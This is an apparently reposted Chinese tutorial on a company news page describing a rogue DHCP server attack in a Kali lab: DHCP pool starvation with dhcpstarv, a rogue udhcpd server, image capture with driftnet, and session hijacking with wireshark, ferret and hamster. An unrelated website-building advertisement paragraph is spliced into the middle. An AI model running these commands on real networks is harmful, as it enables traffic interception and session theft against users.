新聞中心
通常內(nèi)網(wǎng)滲透都是基于ARP的攻擊,但ARP攻擊對(duì)內(nèi)網(wǎng)的負(fù)擔(dān)太重,很容易被發(fā)現(xiàn)。今天講的是基于DHCP協(xié)議的攻擊。

在網(wǎng)站建設(shè)、做網(wǎng)站過程中,需要針對(duì)客戶的行業(yè)特點(diǎn)、產(chǎn)品特性、目標(biāo)受眾和市場(chǎng)情況進(jìn)行定位分析,以確定網(wǎng)站的風(fēng)格、色彩、版式、交互等方面的設(shè)計(jì)方向。成都創(chuàng)新互聯(lián)公司還需要根據(jù)客戶的需求進(jìn)行功能模塊的開發(fā)和設(shè)計(jì),包括內(nèi)容管理、前臺(tái)展示、用戶權(quán)限管理、數(shù)據(jù)統(tǒng)計(jì)和安全保護(hù)等功能。
基于DHCP的攻擊理解起來(lái)很簡(jiǎn)單,首先偽造Mac地址耗竭正常的DHCP服務(wù)器的IP地址,然后黑客用自己的主機(jī)偽造一個(gè)DHCP服務(wù)器,那么新連上內(nèi)網(wǎng)的主機(jī)只能使用流氓DHCP服務(wù)器分配的IP,這樣黑客的主機(jī)就變成了內(nèi)網(wǎng)網(wǎng)關(guān),可以借此控制內(nèi)網(wǎng)中其他主機(jī)的網(wǎng)絡(luò)流量。
攻擊環(huán)境
操作系統(tǒng):Kali linux
網(wǎng)關(guān): 192.168.177.1
IP地址: 192.168.177.128
網(wǎng)段:192.168.177.1/24
0×01 開啟操作系統(tǒng)的路由轉(zhuǎn)發(fā)
echo "1" >/proc/sys/net/ipv4/ip_forward
0×02 攻擊正常的dhcp服務(wù)器,耗光ip資源
dhcpstarv -i eth0 -e 192.168.177.128
Kali默認(rèn)沒有安裝dhcpstarv,也可以用yersinia代替
0×03 安裝dhcp服務(wù)器udhcpd
# apt-get install udhcpd
然后修改一下配置文件
# vim /etc/udhcpd.conf
0×04 啟動(dòng)DHCP服務(wù)器
service udhcpd start
然后啟動(dòng)另一臺(tái)Kali機(jī)當(dāng)作目標(biāo)靶機(jī),由于正常的DHCP服務(wù)器已經(jīng)沒有可分配的IP資源,新的內(nèi)網(wǎng)主機(jī)就會(huì)使用攻擊者DHCP服務(wù)器分配的IP
0×05 抓取目標(biāo)靶機(jī)的圖片
在攻擊主機(jī)上開啟driftnet
# driftnet -i eth0
在目標(biāo)靶機(jī)打開百度圖片
在攻擊者的服務(wù)器上就可以看到圖像
0×06 會(huì)話劫持
開啟wireshark抓取流經(jīng)本地網(wǎng)卡的數(shù)據(jù)包,由于其他的機(jī)器走的是攻擊者主機(jī)的網(wǎng)卡,這也意味著wireshark可以抓取其他主機(jī)的數(shù)據(jù)包
用ferret解析一下
# ferret -r demo.pcap
會(huì)在本地生成一個(gè)名為hamster.txt的文件
然后運(yùn)行harmter,這會(huì)在主機(jī)開啟1234端口
配置一下火狐代理
劫持成功
文章標(biāo)題:流氓DHCP服務(wù)器內(nèi)網(wǎng)攻擊測(cè)試
文章URL:http://m.fisionsoft.com.cn/article/cohhpsd.html


咨詢
建站咨詢
